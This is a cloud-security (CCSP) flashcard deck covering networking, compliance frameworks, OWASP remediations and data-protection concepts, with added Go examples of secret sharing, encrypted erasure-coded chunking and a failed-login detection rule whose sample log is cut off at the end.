Learnzapp Flashcards

1
Q

Maintenance mode

A

Generation of new instances is prevented.

Alerting mechanisms are suspended.

Events are logged.

Admin access continues

2
Q

Remember EU member states

A
3
Q

Maintenance mode :

Live migration
snapshots

A

Live migration is the term used to describe the movement of functioning virtual instances from one physical host to another and how VMs are moved prior to maintenance on a physical device.

VMs are moved as image snapshots when they are transitioned from production to storage;

During live migration, the VM moves in unencrypted form.

Live migration goes over the network; portable media is not necessary.

4
Q

Tunneling

A

Generic routing encapsulation (GRE) is a tunneling mechanism, specifically designed for the purpose.

5
Q

SSH tunnelling includes the services

A

Remote login
Port forwarding
Command Execution

6
Q

TLS

A

TLS is a session encryption tool that uses asymmetric encryption to create a symmetric session key

7
Q

Which risk can make a cloud environment unviable?

A

VM Sprawl

8
Q

NAS (Network Attached Storage)

SAN (Storage Area Network)

A

NAS: a file server that provides data access to multiple, heterogeneous machines and users on the network.

NAS is designed basically for file sharing across the network.

SAN: A SAN typically presents storage devices to users as attached/mounted drives.

SAN is designed to meet high-performance needs.

9
Q

Dynamic Host Configuration Protocol (DHCP) servers

A

Provide the clients:
- A temporary IP address
- A default gateway
- Time server synchronization

Doesn't provide encryption protocols.

10
Q

Data in transit ( Secure)

TLS
DNSSEC
IPSec

A
- TLS

- DNSSEC: Domain Name System Security Extensions (DNSSEC) protects data in transit by reducing the risk of DNS poisoning.

- IPSec: Transport Layer Security (TLS) and Internet Protocol Security (IPSec) reduce the risk of eavesdropping and interception of data.

11
Q

OS Hardening

A

Remove default accounts
Remove unnecessary services
Disallow local save of credentials

12
Q

cloud storage cluster

A

A tightly coupled cloud storage cluster

13
Q

SSD

A

Solid-state disks (SSDs) are used in cloud computing today because they operate at high speeds as compared to traditional spinning drives.

14
Q

IETF

IANA

ISO/IEC

A

The IETF is an international organization of network designers and architects who work together in establishing standards and protocols for the Internet.

IANA oversees global IP address allocation among other Internet tasks.

The ISO/IEC develops, maintains and promotes standards in information technology and information communication technology.

15
Q

ONF : An Organization Normative Framework (ONF)

ANF - application normative frameworks (ANFs)

A

An Organization Normative Framework (ONF) is a framework of so-called containers of application security best practices catalogued and leveraged by the organization and contains at least one or more subcomponents known as application normative frameworks (ANFs).

16
Q

Brewer-Nash (Chinese Wall)

A

Brewer-Nash was specifically created for managed services arrangements, where an administrator for a given customer might also have access to a competitor’s data/environment; the model requires that administrators not be assigned to competing customers. In the modern cloud provider model, a cloud data center administrator will almost definitely have access to many customers from the same industry (i.e., competitors) but probably won’t even know it

17
Q

Ports : DNS

A

DNS: 53
Google DNS server: 8.8.8.8

DNSSEC: adds digital signatures to DNS, which let clients verify the authenticity of DNS records.

18
Q

Network Ports

0 - 1023: well-known ports
1024 - 49151: registered ports
49152 - 65535: dynamic ports

A

Ports are 16-bit binary numbers.
2^16 values: 0 - 65,535

0 - 1023: well-known ports
Web servers: 80
Secure web servers: 443; mail servers

1024 - 49151: registered ports
Microsoft reserves 1433 for SQL Server DB connections

Oracle reserves 1521 for its own databases

49152 - 65535: dynamic ports

19
Q

Administrative Services - Ports

21: FTP
22: SSH
3389: RDP
137, 138, 139: Windows NetBIOS
53: DNS

A
20
Q

Mail services:

25: SMTP
110: POP (Post Office Protocol)
143: IMAP

A
21
Q

Webservices:

80: HTTP
443: HTTPS

A
22
Q

ICMP - Internet Control Message Protocol

- Ping
- traceroute

e.g. traceroute -I linkedin.com

A

Ping: identifies live systems
traceroute: identifies the network path

23
Q

ICANN

A

IP Addresses scarce

24
Q

Private IP Address ranges

A

10.0.0.1 - 10.255.255.255
172.16.0.1 - 172.31.255.255
192.168.0.1-192.168.255.255

25
Q

NAT (Network Address Translation)

NAT & Security

PAT - Port Address Translation

A

PAT allows multiple systems to share the same public IP address by assigning unique ports to each communication.

26
Q

Subnetting : network, host

A

Subdivides larger networks.

27
Q

Subnet mask

A
28
Q

VLAN - Configuring VLANs

A

Enable VLAN Trunking
Assign Switch ports to VLAN

29
Q

Routers, switches, firewalls

A
30
Q

DMZ, Bastion hosts

A
31
Q

Stateless firewalls,
Stateful inspection

Firewall rule content

NGFW (incorporates contextual information into its decision making)

A

Firewall rule contents:
source, destination IP, ports, action (allow, deny)

Implicit deny (default deny)

32
Q

Firewall roles:
NAT gateway
Content / URL filtering
Web application firewall

A
33
Q

Network deployment options:

A
1. Network hardware vs host-based software firewalls
2. Open source or proprietary
3. Hardware appliance vs virtual appliance
34
Q

Network security groups

A

Serve as IaaS firewalls
Maintaining network SGs is the customer's responsibility

35
Q

VPN - Site to site , remote access VPN

A
36
Q

VPN Endpoints

A

Firewalls
Routers
Servers
VPN Concentrators

37
Q

IPSec - works at the network layer (Layer 3)

A

Works at the network layer (Layer 3)
Supports the Layer 2 Tunneling Protocol
Provides secure transport
Difficult to configure

38
Q

Full tunnel VPN, Split tunnel VPN

A
39
Q

Always ON VPN (default)

A
40
Q

IPS , IDS

A
41
Q

IDS : False positives, false negative error

A
42
Q

Signature detection systems / rule based detection systems

A

Problem: fails to detect brand-new attacks
Advantage: low false positive rate

43
Q

Anomaly detection / behaviour-based detection / heuristic detection systems (same thing)

A

High false positive rate

44
Q

IPS deployment models

In-band (inline): device sits in the path of network communications

Out-of-band (passive): device connects to a SPAN port on a switch

A
45
Q

Zero trust networking

IAM Platforms are the foundation of zero trust approaches

A

Zero trust shifts the focus away from perimeter protection onto strong identity and access management.

46
Q

SIEM
SOAR

A
47
Q

CASB

A

Enforce security policies in the cloud

48
Q

EDR (Endpoint detection response) platforms

A

remediate endpoint security issues

49
Q

Security baseline

A

Baselines are generic;
they cover an uncertain future.

50
Q

Accreditation Process

A

Initiation, security certification, security accreditation, continuous monitoring phase

51
Q

SSH Tunneling

A

Doesn't provide content filtering.

It provides:
remote log-on
port forwarding
command execution

52
Q

Storage Clusters:
Tightly coupled
Loosely Coupled

A

Storage devices are clustered in groups, providing increased performance, flexibility, and reliability.

53
Q

Tightly coupled cluster

A

tightly coupled architecture also enhances performance a

the tightly coupled cluster has a maximum capacity, whereas the loosely coupled cluster does not.

54
Q

loosely coupled cluster,

A

A loosely coupled cluster, on the other hand, allows for greater flexibility.

55
Q

DHCP - Dynamic Host Configuration Protocol servers

A

Provide the clients a temporary IP address, default gateway, and time server sync.

Doesn't provide encryption protocols.

56
Q
A
57
Q

Domain 1:

A
58
Q

Magnetic swipe cards

A

Data on Magnetic swipe cards is not usually encrypted

59
Q

SOC reports

A

SOC reports are the audit reporting mechanisms dictated by SSAE 18. SOX is a federal law targeting publicly traded corporations in the United States. SSL is a way to conduct secure online transactions. SABSA is an architecture framework.

60
Q

SSAE report:
SOC 1 - financial reporting
SOC 2 - deals with CIA
SOC 3 - attestation by the auditor

A

SOC 1 - financial reporting
SOC 2 - deals with CIA
SOC 3 - attestation by the auditor

SOC 2 reports were not designed for dissemination outside the target organization.

61
Q

Statutory compliance

A

Statutory compliance refers to state and federal laws. They cannot force a customer to stay with a cloud provider.

62
Q

CASB

A

Provides services such as key escrow, single sign-on, and IAM.

63
Q

*****Federal Express - Private company

A

Federal Express is a private company; only federal entities are required to comply with FedRAMP.

64
Q

Elliptical curve cryptography (ECC)

A

Elliptical curve cryptography (ECC) uses algebraic elliptical curves that result in much smaller keys that can provide the same level of safety as much larger ones used in traditional key cryptography

65
Q

****Virtual machine introspection (VMI)

A

Virtual machine introspection (VMI) is an agentless means of ensuring a VM’s security baseline does not change over time by examining things such as physical address, network settings, and installed OS. These ensure that the baseline has not been inadvertently or maliciously tampered with.

66
Q

Virtualization technologies - cloud computing

A

Virtualization technologies have been the driving force behind enabling cloud computing to become a real and scalable service due to the savings, sharing, and allocation of resources across multiple tenants and environments.

67
Q

A demilitarized zone (DMZ)

A

A demilitarized zone (DMZ) isolates network elements that are public facing and would otherwise be vulnerable to attack.

68
Q

Type 1, Type 2 hypervisor

A

A Type 1 hypervisor uses a minimal piece of software to manage the underlying resources. A Type 2 hypervisor is a piece of software installed on top of or as part of a device’s operating system.

69
Q

A hybrid cloud

A

A hybrid cloud is a combination of two or more distinct cloud infrastructures that remain unique entities but are bound together by standardized or proprietary technology that enables data and application portability.

70
Q

**Cloud migration

A

Cloud migration is the process of transitioning all or part of a company’s data, applications, and services from onsite premises behind the firewall to the cloud. This enables information to be provided over the Internet on an on-demand basis.

71
Q

Corporate governance

A

Corporate governance is defined as the relationship between shareholders and other stakeholders in the organization versus the senior management.

72
Q

Auditability

A

Something is said to be auditable when it is in a state of readiness for auditing. Cloud providers are often required to maintain a state of auditability as a way of maintaining compliance.

73
Q

Cloud server hosting

A

Cloud server hosting is a type of hosting in which hosting services are available to customers on demand via the Internet as opposed to being provided by a single server or virtual server. In a cloud services model, multiple connected servers that a cloud server comprises provide the hosting environment.

74
Q

Public key infrastructure (PKI)

A

Public key infrastructure (PKI) is a framework of programs, procedures, communication protocols, and public key cryptography that enables a diverse group of individuals to communicate securely.

75
Q

Turnstiles

egress monitoring
encryption
digital watermarking

A

Turnstiles are a physical security barrier to prevent piggybacking/tailgating (an unauthorized person coming through an entrance behind someone who is authorized), but they don’t really present much protection for intellectual property in this case.

Egress monitoring (often referred to as “DLP” solutions) is a great way to reduce the likelihood of intellectual property leaving the owner’s control in an unexpected/unapproved manner. Likewise, strong encryption is useful in the cloud to reduce the impact of theft either from leakage to other cloud tenants or from insider threats (such as malicious admins in the employ of the cloud provider). Finally, digital watermarks aid protection of intellectual property by proving original ownership, which is essential for enforcing intellectual property rights (in the case of software design, mainly copyright protections).

76
Q

PCI DSS CVV

A

PCI DSS requires that the CCV (or, sometimes, “CVV” for “card verification value”) only be used in the transaction, not stored. The data described in all the other options may be stored after the transaction is complete.

77
Q

SSAE, AICPA

A

SSAE 18 is the current AICPA audit standard, as of 2018.

78
Q

SABSA

A

SABSA is an IT architecture framework.

SABSA is a means of looking at security capabilities from a business perspective.

79
Q

COBIT

A

COBIT is designed for all types of business, regardless of their purpose.

80
Q

TOGAF

A

TOGAF is a means to incorporate security architecture with the overall business architecture.

81
Q

ITIL

A

ITIL was specifically designed to address service delivery entities.

82
Q

NIST SP 800-53 - RMF

A

NIST SP 800-53 contains guidance for selecting security controls in accordance with the Risk Management Framework.

NIST SP 800-53 is a standard, not a law.

83
Q

SOX

A

SOX affects publicly traded corporations.

84
Q

SOC1

A

The SOC 1 report provides information about the financial reporting mechanisms of the target only and is of little interest to the IT security professional.

The SOC 1 audit report is not for security controls; it is for financial reporting controls.

85
Q

The SOC 2, Type 2

A

The SOC 2, Type 2 report will provide details on IT security controls used by the target and how well those controls function.

86
Q

The SOC 3 report

A

The SOC 3 report is only an attestation that the target was audited and that it passed the audit, without detail.

The SOC 3 report is an attestation that the target was audited and that it passed the audit, without detail; you could use the SOC 3 reports to quickly narrow down the list of possible providers by eliminating the ones without SOC 3s.

87
Q

PCI DSS

A

Because PCI DSS is strictly voluntary, and the PCI Council is not a government body but a consortium of private interests, they cannot detain or imprison anyone.
They can, however, assess fees, suspend processing privileges, and require more auditing, s

88
Q

PCI Merchant levels

A

The PCI merchant levels are based on how many transactions a compliant entity engages in over the course of a year.

Level 1: Merchants that process more than 6 million card transactions per year
Level 2: Merchants that process between 1 million and 6 million card transactions per year
Level 3: Merchants that process between 20,000 and 1 million card transactions per year
Level 4: Merchants that process fewer than 20,000 card transactions per year

89
Q

Merchant level 1

A

Merchant level 1 is for the merchants that engage in the most transactions per year (six million or more). It carries with it the requirement for the most comprehensive, detailed, and repeated security validation actions.

90
Q

Federal Information Processing Standard (FIPS) 140-2 security levels for cryptographic module

A

The Federal Information Processing Standard (FIPS) Publication 140-2 defines four levels of security for cryptographic modules, with each level offering increasing physical protection:

Level 1: The lowest level of security, requiring production-grade equipment and externally tested algorithms

Level 2: Improves physical security with pick-resistant locks and role-based authentication

Level 3: Provides a high probability of detecting and responding to physical access attempts, with physical tamper-resistance and identity-based authentication

Level 4: The highest level of security, with tamper-active hardware that erases its contents if it detects changes in normal operating conditions

91
Q

Evaluation Assurance Level (EAL)

A

The EAL is a measure of how thoroughly the security features the product vendor claims the product offers have been tested and reviewed, and by whom.

92
Q

Common Criteria certification of an IT product - who pays? The vendor

A

The vendor/manufacturer of a given product will pay to have it certified, with the premise that certification costs are offset by premium prices that certified products command and that customers won’t purchase uncertified products.

93
Q

**NIST Publishes

A

NIST publishes the list of validated crypto modules. The other choices are government or non-government organizations that are not involved with publishing the list of cryptographic modules that meet FIPS 140-2 requirements.

94
Q

HSM Certification

A

Vendors seeking HSM certification under FIPS 140-2 send their products to independent laboratories that have been validated as Cryptographic Module Testing Laboratories under the National Voluntary Laboratory Accreditation Program (the Accreditation Program is run by NIST, which approves the laboratories). As of this writing, 21 labs in the United States and Canada are accredited.

95
Q

FIPS 140-2

A

FIPS 140-2 is only for sensitive but unclassified (SBU) data.

FIPS 140-2 is the federal standard for the accreditation and distinguishing of secure and well-architected cryptographic modules produced by private sector vendors who seek to have, or are in the process of having, their solutions and services certified by the US government departments and regulated industries that collect, store, transfer, or share data that is deemed to be sensitive but not classified.

96
Q

Broken authentication and session management - risk reduction

A

Method for reducing the risk of broken authentication and session management:

Do not use custom authentication schemes.

97
Q

OWASP Top 10: insecure direct object references

A

Check access each time a direct object reference is called by an untrusted source.

98
Q

OWASP Top 10: Injection

A

What the attacker is trying to do with an injection attack:
Trick the application into running commands.

99
Q

OWASP Top 10: broken authentication and session management

A

Reduce risk by:
Do not use custom authentication schemes.

100
Q

OWASP Top 10: cross-site scripting (XSS) attacks

A

HTML escape all HTML attributes.

101
Q

OWASP Top 10: cross-site request forgery (CSRF)

A

Remediation: Ensure that all HTTP resource requests include a unique, unpredictable token.

102
Q

OWASP Top 10: security misconfiguration

A

Example: Having unpatched software in the production environment

Techniques to reduce:
Perform periodic scans and audits of the environment.

Follow a published, known industry standard for baseline configurations.

Use a repeatable patching process that includes updating libraries as well as software.

103
Q

OWASP Top 10: missing function level access control

A

Reduce by:
Set the default to deny all access to functions, and require authentication/authorization for each access request.

104
Q

OWASP Top 10: using components with known vulnerabilities

A

Remediation: Update to current versions of component libraries as soon as possible.

Review all updates/lists/notifications for components your organization uses.

105
Q

OWASP Top 10: sensitive data exposure

A

Techniques to reduce:
Destroying sensitive data as soon as possible

Using proper key management when encrypting sensitive data

Disabling autocomplete on forms that collect sensitive data

Extensive user training on proper data handling techniques

106
Q

Why an organization might still be using components with known vulnerabilities

A

The particular vulnerabilities exist only in a context not being used by developers.

107
Q

OWASP Top 10: unvalidated redirects and forwards

A

Train users to recognize unvalidated links.

Don’t use redirects/forwards in your applications.

108
Q

Redirects and Forwards

A

A forward is a situation where, instead of going to an external URL, your website or web application causes the browser to go to a different part of the same site. Redirects and forwards are technically identical; the only difference is the type of destination: external URLs vs. internal pages.

109
Q

Lightweight Directory Access Protocol (LDAP)

A

LDAP is used in constructing and maintaining centralized directory services, which are vital in all aspects of IAM.

110
Q

Privileged user account access

A

Privileged users should have privileged access to specific systems/data only for the duration necessary to perform their administrative function; any longer incurs more risk than value.

111
Q

The Cloud Security Alliance (CSA) - Data Breach

A

The CSA points out that data breaches come from a variety of sources, including both internal personnel and external actors.

112
Q

Service traffic hijacking

A

Service traffic hijacking can affect all portions of the CIA triad.

113
Q

Distributed denial of service (DDoS)

A

Denial-of-service attacks staged from multiple machines against a specific target are the definition of a DDoS.

114
Q

Incidents versus Events

A

Events are anything that can occur in the IT environment, whereas incidents are unscheduled events.

115
Q

PIPEDA - Canada

A

The Personal Information Protection and Electronic Documents Act (PIPEDA) is a Canadian law governing protection of personal information.

116
Q

FIPS 140-2

A

The Federal Information Processing Standard (FIPS) 140-2 standard certifies cryptologic components for use by American federal government entities.

117
Q

HIPAA

A

The Health Information Portability and Accountability Act (HIPAA) is an American law regulating patient information for medical providers.

118
Q

The cross-certification model

A

The cross-certification model of federated identity requires all participants to review and confirm all the others.

119
Q

Community Cloud

A

The community cloud is defined by its joint ownership of assets among a member group.

120
Q

A private cloud - Very sensitive assets.

A

A private cloud is the best option for work in highly regulated industries or industries that involve very sensitive assets.

121
Q

A private cloud - European personal data privacy laws

A

Scenario: a European appliance rental company.

Because of European personal data privacy laws, it is extremely important for your company to be sure that the data does not leave the borders of a country approved to handle such data. A private cloud model is the best means for your company to be sure that the data is processed in a data center residing in a particular geophysical location.

122
Q

Big data

A

Big data refers to extremely large data sets used to determine patterns and trends such as purchasing or travel trends of large groups of people.

123
Q

Portability

A

Portability is the term used to describe the ease with which a customer can move from one cloud provider to another; the higher the portability, the less chance for vendor lock-in.

124
Q

A cloud reseller

A

A cloud reseller is a firm that contracts with both cloud providers and customers in order to arrange custom services.

The cloud computing reseller purchases hosting services and then resells them.

125
Q

Cloud carrier

A

Cloud carrier is a term describing the intermediary between cloud customer and provider that delivers connectivity; this is typically an ISP.

126
Q

Cash flow at Risk (CFaR)

A

When the amount of cash you receive from your operations is less than all expenditures and bills from the sales.

127
Q

X.509

A

X.509 is the certificate standard for communicating public key information.

128
Q

Encryption in cloud computing

A

Storage, Remote access, Secure sessions

The data on magnetic swipe cards isn’t usually encrypted.

129
Q

Erasure Coding

A

Erasure coding is the practice of having sufficient data to replace a lost chunk in data dispersion, protecting against the possibility of a device failing while it holds a given chunk; parity bits serve the same purpose in a traditional RAID configuration.

130
Q

Egress Monitoring Solutions

A

Egress monitoring solutions (often referred to as DLP tools, where DLP stands for data loss prevention or data leak prevention) inspect data leaving the environment. They usually include an agent that resides on client devices to inspect data being shared or sent by end users, and they discover data assets according to their classification/categorization.

Uses of an egress monitoring solution:
E-discovery/forensics
Detecting and blocking data exfiltration
Data categorization/classification

131
Q

DRM Solutions

A

DRM is mainly designed to protect intellectual property. It can also sometimes be used for securing PII, but intellectual property is a better answer here.

DRM is often deployed to ensure that copyrighted material (frequently software) is only delivered to and used by licensed recipients.

132
Q

Homomorphic encryption

A

Homomorphic encryption allows computation on encrypted data without decrypting it first. Fully homomorphic schemes exist (the first was published in 2009) and are implemented in libraries, but they remain far slower than computing on plaintext, so the CCSP material still treats the technology as experimental.

133
Q

International traffic in arms regulations (ITAR)

A

The International Traffic in Arms Regulations (ITAR) are U.S. government regulations that control the export of defense articles and services. ITAR is a Department of State program, administered by the Directorate of Defense Trade Controls (DDTC).

134
Q

Export administration regulations (EAR)

A

The Export Administration Regulations (EAR) govern the export and re-export of some commodities, software and technology.

135
Q

ITAR versus EAR

A

EAR focuses on dual-use items, while ITAR targets defense-related items.

Export administration regulations (EAR) is a Commerce Department program

International traffic in arms regulations (ITAR) is a Department of State program.

136
Q

A content delivery network (CDN)

A

A content delivery network (CDN) is a service that distributes copies of data across a geographically spread set of caching servers, so that each request is served from a node near the user; besides performance, the distributed capacity absorbs traffic floods.

137
Q

Data dispersion versus RAID

Scalable cloud hosting

A

Data dispersion uses chunks of data, erasure coding, and encryption.

Parity bits and disk striping are characteristic of RAID implementations.

Cloud-bursting is a feature of scalable cloud hosting.

138
Q

Copyright

A

Copyrights protect tangible expressions of creative works, like books, articles, music, and so on.

139
Q

Trademark

A

Logos and symbols and phrases and color schemes that describe brands are trademarks.

140
Q

Trade secrets

A

Confidential recipes unique to the organization are trade secrets.

Confidential sales and marketing materials unique to the organization are trade secrets.

141
Q

Patents

A

Patents protect processes (as well as inventions, new plant life, and decorative patterns).

142
Q

Personal cloud storage

A

Personal cloud storage is the storage of a single user’s data in the cloud, allowing them access from anywhere on the Internet.

143
Q

Volume Storage

A

Volume storage consists of virtual disks attached to a virtual machine or instance; a volume behaves just like a physical drive or array (block storage) and is partitioned, formatted and mounted like one.

144
Q

Secret sharing made short (SSMS)

Bit splitting

A

SSMS is a bit-splitting method with three phases: encrypt the data, split the ciphertext with an information dispersal algorithm (IDA), and split the encryption key with a secret sharing algorithm (a threshold scheme, so that any k of n key fragments recover the key). The fragments are signed and distributed to different cloud storage services; recovering the data requires collecting enough of both the data fragments and the key fragments, so no single storage provider can decrypt it.
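
As an added example (not part of the flashcard deck and not any vendor's SSMS implementation), the key-splitting phase of SSMS in Go: Shamir's threshold secret sharing over GF(2^8), the same finite field AES uses. split turns a 32-byte key into n shares, combine recovers it from any k of them, and fewer than k shares carry no information about the key. The function names, the 3-of-5 parameters and the random demo key are this example's own choices; the signing of fragments that SSMS also performs is not shown.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"fmt"
)

// gfMul multiplies in GF(2^8) with the AES reduction polynomial x^8+x^4+x^3+x+1 (0x11b).
func gfMul(a, b byte) byte {
	var p byte
	for ; b != 0; b >>= 1 {
		if b&1 == 1 {
			p ^= a
		}
		a = a<<1 ^ (0x1b & byte(int8(a)>>7)) // reduce when the high bit shifts out
	}
	return p
}

// gfInv returns a^-1 = a^254 by square-and-multiply (Fermat, since the field has 256 elements).
func gfInv(a byte) byte {
	r, base := byte(1), a
	for e := 254; e > 0; e >>= 1 {
		if e&1 == 1 {
			r = gfMul(r, base)
		}
		base = gfMul(base, base)
	}
	return r
}

type share struct {
	X byte   // evaluation point 1..n; never 0, because f(0) is the secret itself
	Y []byte // one polynomial evaluation per secret byte
}

// split makes n shares of secret such that any k reconstruct it. Each secret byte is the
// constant term of its own random polynomial of degree k-1; a share is that polynomial at X.
func split(secret []byte, k, n int) ([]share, error) {
	if k < 2 || n < k || n > 255 {
		return nil, fmt.Errorf("invalid threshold %d of %d", k, n)
	}
	shares := make([]share, n)
	for i := range shares {
		shares[i] = share{X: byte(i + 1), Y: make([]byte, len(secret))}
	}
	coef := make([]byte, k)
	for j, s := range secret {
		if _, err := rand.Read(coef[1:]); err != nil {
			return nil, err
		}
		coef[0] = s
		for i := range shares {
			var y byte // Horner evaluation of the polynomial at X
			for d := k - 1; d >= 0; d-- {
				y = gfMul(y, shares[i].X) ^ coef[d]
			}
			shares[i].Y[j] = y
		}
	}
	return shares, nil
}

// combine interpolates each polynomial at x = 0 (Lagrange) from any k or more shares.
// Given fewer than k shares it still returns bytes, but they are unrelated to the secret.
func combine(shares []share) []byte {
	secret := make([]byte, len(shares[0].Y))
	for j := range secret {
		var acc byte
		for i, si := range shares {
			num, den := byte(1), byte(1)
			for m, sm := range shares {
				if m != i { // basis_i(0) = prod x_m / (x_m - x_i); subtraction is XOR here
					num = gfMul(num, sm.X)
					den = gfMul(den, sm.X^si.X)
				}
			}
			acc ^= gfMul(si.Y[j], gfMul(num, gfInv(den)))
		}
		secret[j] = acc
	}
	return secret
}

func main() {
	key := make([]byte, 32) // stands in for the AES key from the SSMS encryption phase
	rand.Read(key)
	shares, _ := split(key, 3, 5)
	fmt.Println("3 of 5 shares recover the key:", bytes.Equal(combine(shares[1:4]), key))
	fmt.Println("2 of 5 shares recover the key:", bytes.Equal(combine(shares[:2]), key))
}
```

Each storage provider holds one share of the key alongside its data fragment; an attacker who compromises fewer than k providers learns nothing about the key, and the data owner can still recover the key after losing up to n-k providers.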

145
Q

Information rights management (IRM)

A

Information rights management (IRM) is a means to prevent unauthorized copying and limitation of distribution to only those who pay for content.

146
Q

crypto-shredding

A

The purpose of crypto-shredding is to make the data unrecoverable: encrypt the data, then destroy every copy of the key. Saving a backup of the keys would defeat that outcome, because the keys would still exist and could be used to recover the data.

147
Q

Data dispersion - chunking/sharding
RAID - Striping

A

Data dispersion is basically RAID in the cloud: data elements are parsed and stored over several areas/devices instead of stored as a unit in a single place. RAID (and data dispersion) aid BC/DR by increasing the robustness and resiliency of stored data, but BC/DR is a much more general discipline, so it is not the best answer. SDN separates the network control plane from the data (forwarding) plane, and a CDN is usually used for ensuring the quality of streaming media.

Where RAID uses data striping across multiple drives, with data dispersion the technique is referred to as "chunking," or sometimes "sharding" when encryption is also used (that is the CCSP usage; in general database usage, sharding simply means horizontal partitioning).
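
An added example that covers the erasure coding, data dispersion versus RAID, and chunking cards above (it is not the deck's material or any cloud provider's implementation): data is encrypted with AES-256-GCM, the ciphertext is cut into k chunks, and one XOR parity chunk is added, which is the simplest erasure code and gives the same single-loss guarantee as RAID 5 parity. Losing any one chunk, data or parity, is recoverable; losing two is not, which is why production systems use Reed-Solomon codes that tolerate m losses per stripe; and GCM's authentication tag makes a tampered chunk fail rather than decrypt to garbage. Function names, the length-prefix layout and the demo key are this example's own.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// disperse encrypts plaintext with AES-256-GCM, then splits the ciphertext into k equal chunks
// plus one XOR parity chunk: a single-loss erasure code, the same idea as RAID 5 parity.
// The ciphertext length is prefixed so the zero padding can be stripped after reassembly.
func disperse(key, plaintext []byte, k int) ([][]byte, error) {
	gcm, err := newGCM(key)
	if err != nil || k < 2 {
		return nil, fmt.Errorf("bad key or chunk count: %v", err)
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := gcm.Seal(nonce, nonce, plaintext, nil) // nonce || ciphertext || tag
	buf := make([]byte, 4+len(ct))
	binary.BigEndian.PutUint32(buf, uint32(len(ct)))
	copy(buf[4:], ct)
	chunkLen := (len(buf) + k - 1) / k
	buf = append(buf, make([]byte, k*chunkLen-len(buf))...) // zero-pad to k equal chunks

	chunks := make([][]byte, k+1)
	parity := make([]byte, chunkLen)
	for i := 0; i < k; i++ {
		chunks[i] = buf[i*chunkLen : (i+1)*chunkLen]
		for j := range parity {
			parity[j] ^= chunks[i][j]
		}
	}
	chunks[k] = parity
	return chunks, nil
}

// reassemble takes the k+1 chunks with at most one nil (lost) entry, rebuilds the missing one
// by XORing the survivors, then decrypts. GCM's tag means a corrupted chunk fails closed.
func reassemble(key []byte, in [][]byte) ([]byte, error) {
	chunks := append([][]byte(nil), in...) // leave the caller's slice untouched
	k, lost := len(chunks)-1, -1
	for i, c := range chunks {
		if c == nil && lost != -1 {
			return nil, fmt.Errorf("more than one chunk lost; single parity cannot recover")
		} else if c == nil {
			lost = i
		}
	}
	if lost != -1 {
		var rebuilt []byte
		for i, c := range chunks {
			if i == lost {
				continue
			}
			if rebuilt == nil {
				rebuilt = make([]byte, len(c))
			}
			for j := range c {
				rebuilt[j] ^= c[j]
			}
		}
		chunks[lost] = rebuilt
	}
	buf := bytes.Join(chunks[:k], nil)
	if len(buf) < 4 || int(binary.BigEndian.Uint32(buf)) > len(buf)-4 {
		return nil, fmt.Errorf("length prefix is corrupt")
	}
	ct := buf[4 : 4+binary.BigEndian.Uint32(buf)]
	gcm, err := newGCM(key)
	if err != nil || len(ct) < gcm.NonceSize() {
		return nil, fmt.Errorf("bad key or truncated ciphertext")
	}
	ns := gcm.NonceSize()
	return gcm.Open(nil, ct[:ns], ct[ns:], nil)
}

func main() {
	key := bytes.Repeat([]byte{0x42}, 32) // constructed demo key; use a KMS-managed key in practice
	chunks, err := disperse(key, []byte("customer record: alice@example.test, balance 1200"), 4)
	if err != nil {
		panic(err)
	}
	chunks[2] = nil // the storage node holding chunk 2 is gone
	out, err := reassemble(key, chunks)
	fmt.Printf("recovered %q (err=%v)\n", out, err)
}
```

Because encryption happens before chunking, each storage location holds only a slice of ciphertext; an attacker who obtains every chunk from one provider still needs the key, and an attacker who can modify a chunk only causes a detectable decryption failure.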

148
Q

DRM Solution characteristics

A

Mapping to existing access control lists (ACLs): lets DRM tools provide additional access control protections for the organization's assets.

Continuous audit trail: lets DRM tools log and exhibit all access to a given object.

Automatic expiration: lets DRM tools prevent access to objects when a license expires, or remove protections when intellectual property moves into the public domain.

Persistence: lets DRM protection follow protected files wherever they might be stored/copied.

149
Q

Transparent encryption

A

Transparent encryption is performed by the database engine itself, with no change to the application; depending on the product it can be applied to the whole database, to specific tablespaces/files, or to specific tables or columns. Encrypting specific tables within the database is one of the options of transparent encryption.

150
Q

Application-level encryption: the database encryption technique that makes it most difficult to perform database functions (searches, indexing, etc.)

A

Application-level encryption involves encrypting the data before it enters the fields of the database; the database then holds only ciphertext, so searching, indexing and reviewing that data is much more difficult, which reduces the functionality of the database.

151
Q

Event monitoring tools (SIEM, SIM, SEM) can be used for:

Detecting external hacking
Predicting system outages
Optimizing performance
Detecting ambient heating, ventilation, and air-conditioning (HVAC) problems
Preserving incident evidence

A

Event monitoring tools can help detect external hacking efforts by tracking and reporting on common hack-related activity, such as repeated failed login attempts and scanning.

Event monitoring tools can be used to predict system outages by noting decreases in performance; repeated performance issues can be an indicator that a device is failing.

Event monitoring tools can detect repeated performance issues, which administrators and architects can use to enhance performance/productivity.

Event monitoring tools can detect repeated performance issues that are indicative of improper temperature settings in the data center; some system monitoring metrics, such as CPU temperature, directly indicate inadequate HVAC performance.

The logs these tools collect and retain also serve as evidence during incident response and any subsequent forensic investigation.
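
A concrete version of "tracking repeated failed login attempts", added here as an example and not taken from any SIEM product: a brute-force rule (at least N failures from one source inside a sliding time window) and a password-spraying rule (one source failing against many different accounts) run over a constructed authentication log. The log format, field order, thresholds and IP addresses are this example's own assumptions. The slow attacker at 198.51.100.9 only trips the rule when the window is widened from one minute to five, which is the tuning trade-off a SIEM analyst actually faces.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// Constructed sample authentication log (not from any real system).
// Fields: RFC3339 timestamp, source IP, username, result.
const sampleLog = `2024-05-01T10:00:01Z 203.0.113.7 alice FAIL
2024-05-01T10:00:04Z 203.0.113.7 alice FAIL
2024-05-01T10:00:09Z 203.0.113.7 bob FAIL
2024-05-01T10:00:15Z 203.0.113.7 carol FAIL
2024-05-01T10:00:20Z 203.0.113.7 dave FAIL
2024-05-01T10:00:22Z 198.51.100.9 alice FAIL
2024-05-01T10:03:00Z 198.51.100.9 alice OK
2024-05-01T10:10:00Z 198.51.100.9 alice FAIL
2024-05-01T10:11:00Z 198.51.100.9 alice FAIL
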